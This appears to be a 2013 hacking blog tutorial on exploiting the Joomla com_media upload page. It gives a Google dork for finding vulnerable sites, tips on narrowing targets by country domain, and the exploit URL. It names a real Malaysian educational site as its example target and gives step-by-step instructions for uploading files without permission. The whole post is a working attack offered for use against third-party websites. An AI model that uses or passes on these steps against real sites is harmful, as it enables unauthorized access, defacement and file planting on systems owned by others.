Thursday, 21 November 2013

Com_media [ CMS Joomla]



Dork :

 inurl:index.php?option=com_media


Exploit :

 /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Steps

1- Open Google

2- Paste the dork. If you want a specific search result, you must add the site domain for your target. For example, if your target is Malaysian site, you must put "site:.my" at the back of your dork.

Example :

inurl:index.php?option=com_media site:.my

inurl:index.php?option=com_media site:.au

3- After that, paste the exploit behind the site address and it will become like this,

http://www.ikmbintulu.edu.my/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

4- You will see something like this,



This means the site is vulnerable


This means the site is not vulnerable


5- Click "Choose File" and choose your .txt / .jpg / .gif file to upload.

6- Click " Start Upload "

7- To view your file, add /images/yourfilename.txt at the back of the site


That's All My Tutorial For This Time :D

Live Demo: